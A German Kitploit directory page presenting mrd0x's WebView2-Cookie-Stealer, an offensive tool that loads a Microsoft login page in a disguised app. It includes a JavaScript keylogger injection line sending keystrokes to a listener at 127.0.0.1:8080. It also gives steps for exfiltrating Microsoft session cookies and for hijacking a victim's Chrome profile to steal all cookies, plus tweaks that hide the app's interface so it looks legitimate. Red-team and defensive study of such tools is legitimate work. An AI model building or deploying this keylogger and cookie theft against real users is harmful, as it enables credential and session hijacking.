Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WebView2-Cookie-Stealer — Injectiert einen JavaScript-Keylogger in WebView2-Seiten, um Tastatureingaben zu erfassen und Cookies aus Microsoft-Authentifizierungssitzungen über HTTP-GET-Anfragen zu exfiltrieren. | Kitploit
Tools/GitHubGitHub/mrd0x/webview2-cookie-stealer
PasswortangriffeWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungPhishing
GitHubmrd0x/webview2-cookie-stealer

WebView2-Cookie-Stealer

Injectiert einen JavaScript-Keylogger in WebView2-Seiten, um Tastatureingaben zu erfassen und Cookies aus Microsoft-Authentifizierungssitzungen über HTTP-GET-Anfragen zu exfiltrieren.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
26658vor 4 JahrenVon Kitploit geprüft

Blogbeitrag

Bitte lesen Sie diesen Blogbeitrag für weitere Informationen.

Quellcode

Dieser Code ist eine modifizierte Version von Microsofts WebView2-Code. Der aktuelle Code kann bereinigt und wesentlich verbessert werden.

Demo

Startbeispiel

Anwendungsbeispiel

Verwendung

Getestet unter Windows 10 & 11.

Wenn die Binärdatei ausgeführt wird, wird https://office.com/login geladen. Ein JavaScript-Keylogger wird in jede Seite injiziert und Tastatureingaben werden an http://127.0.0.1:8080 gesendet. Darüber hinaus werden nach erfolgreicher Authentifizierung des Benutzers die Cookies für login.microsoftonline.com base64-kodiert und per HTTP-GET-Anfrage an http://127.0.0.1:8080 gesendet.

JavaScript ändern

Falls Sie das JavaScript ändern möchten, finden Sie den zu ändernden Code unten in Zeile 1096 in AppWindow.cpp.

root@kitploit:~
coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e.key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);

Chrome-Cookies stehlen

WebView2 ermöglicht es, mit einem bestehenden Benutzerdatenordner (User Data Folder, UDF) zu starten, anstatt einen neuen zu erstellen. Der UDF enthält alle Passwörter, Sitzungen, Lesezeichen usw. Der Chrome-UDF befindet sich unter C:\Users\<Benutzername>\AppData\Local\Google\Chrome\User Data. Wir können WebView2 einfach anweisen, die Instanz mit diesem Profil zu starten und nach dem Start alle Cookies zu extrahieren und an den Angreiferserver zu übertragen.

Der einzige Haken ist, dass WebView2 nach einem Ordner namens EBWebView sucht, anstatt nach User Data (keine Ahnung, warum). Kopieren Sie den Ordner User Data und benennen Sie ihn in EBWebView um.

Erforderliche Änderungen

  • Bei Zeile 41 in app.cpp:

    • Ändern Sie std::wstring userDataFolder(L""); zu std::wstring userDataFolder(L"C:\\Pfad\\Zum\\Temp");
    • Der angegebene Ordner muss den Ordner EBWebView enthalten, aus dem WebView2 lesen wird.
  • Bei Zeile 40 in ScenarioCookieManagement.cpp:

    • Ändern Sie GetCookiesHelper(L"https://login.microsoftonline.com"); zu GetCookiesHelper(L"");

Wenn GetCookiesHelper ohne Angabe einer Website aufgerufen wird, werden alle Cookies extrahiert.

Hinweis: Dies funktioniert mit der aktuellen Anwendung nicht, wenn eine große Menge an Cookies vorhanden ist, da die Anwendung sie per GET-Anfrage sendet, die eine Längenbegrenzung hat.

Wichtige Funktionen

Wenn Sie Änderungen an der Binärdatei vornehmen möchten, finden Sie unten Informationen zu den wichtigen Funktionen.

  • AppStartPage.cpp - Die Funktion GetUri() enthält die URL, die beim Ausführen der Binärdatei geladen wird.
  • ScenarioCookieManagement.cpp - Die Funktion SendCookies() enthält die IP-Adresse und den Port, an die die Cookies gesendet werden.
  • AppWindow.cpp - Die Funktion CallCookieFunction() wartet, bis die URL mit https://www.office.com/?auth= beginnt, und ruft ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com") auf.
  • WebView2APISample.rc - Kosmetische Änderungen
    • Entfernen Sie die Menüleiste, indem Sie alle POPUP-Werte auf "" setzen.
    • Ändern Sie IDS_APP_TITLE und IDC_WEBVIEW2APISAMPLE. Dies ist der Name der Anwendung in der Titelleiste.
    • Ändern Sie IDI_WEBVIEW2APISAMPLE, IDI_WEBVIEW2APISAMPLE_INPRIVATE und . Diese verweisen auf eine -Datei, die das Symbol dieser Anwendung ist.
Tool herunterladen
IDI_SMALL
.ico
  • Toolbar.cpp - itemHeight muss auf 0 gesetzt werden, um das obere Menü zu entfernen. Dies ist in diesem Code bereits erledigt.
  • AppWindow.cpp - LoadImage() sollte auskommentiert werden. Dies blendet das blaue Startbild aus. Dies ist in diesem Code bereits erledigt.
  • App.cpp - new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false); ändern Sie den letzten Parameterwert auf true. Dadurch wird die Symbolleiste ausgeblendet. Dies ist in diesem Code bereits erledigt.